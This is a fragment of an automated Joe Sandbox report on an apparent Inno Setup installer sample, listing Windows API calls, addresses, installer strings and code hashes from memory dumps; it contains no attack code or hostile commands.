                                                                                • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                APIs
                                                                                • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Global$AllocHandleLockUnlock
                                                                                • String ID:
                                                                                • API String ID: 2167344118-0
                                                                                • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                APIs
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                Strings
                                                                                • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                • API String ID: 3535843008-1938159461
                                                                                • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                Strings
                                                                                • Will not restart Windows automatically., xrefs: 004836F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveForeground
                                                                                • String ID: Will not restart Windows automatically.
                                                                                • API String ID: 307657957-4169339592
                                                                                • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                APIs
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                Strings
                                                                                • Extracting temporary file: , xrefs: 004763EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileTime$Local
                                                                                • String ID: Extracting temporary file:
                                                                                • API String ID: 791338737-4171118009
                                                                                • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                Strings
                                                                                • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                • API String ID: 0-1974262853
                                                                                • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                Strings
                                                                                • %s\%s_is1, xrefs: 00478F10
                                                                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                • API String ID: 47109696-1598650737
                                                                                • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ExecuteMessageSendShell
                                                                                • String ID: open
                                                                                • API String ID: 812272486-2758837156
                                                                                • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                APIs
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                • String ID: <
                                                                                • API String ID: 893404051-4251816714
                                                                                • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                • String ID: )
                                                                                • API String ID: 2227675388-1084416617
                                                                                • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window
                                                                                • String ID: /INITPROCWND=$%x $@
                                                                                • API String ID: 2353593579-4169826103
                                                                                • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                APIs
                                                                                  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocByteCharFreeMultiWide
                                                                                • String ID: NIL Interface Exception$Unknown Method
                                                                                • API String ID: 3952431833-1023667238
                                                                                • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                  • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateErrorHandleLastProcess
                                                                                • String ID: 0nI
                                                                                • API String ID: 3798668922-794067871
                                                                                • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Value$EnumQuery
                                                                                • String ID: Inno Setup: No Icons
                                                                                • API String ID: 1576479698-2016326496
                                                                                • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesErrorFileLast
                                                                                • String ID: T$H
                                                                                • API String ID: 1799206407-488339322
                                                                                • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteErrorFileLast
                                                                                • String ID: T$H
                                                                                • API String ID: 2018770650-488339322
                                                                                • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                APIs
                                                                                • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryErrorLastRemove
                                                                                • String ID: T$H
                                                                                • API String ID: 377330604-488339322
                                                                                • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                APIs
                                                                                  • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(73BD0000,00481A2F), ref: 0047D0E2
                                                                                  • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                  • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
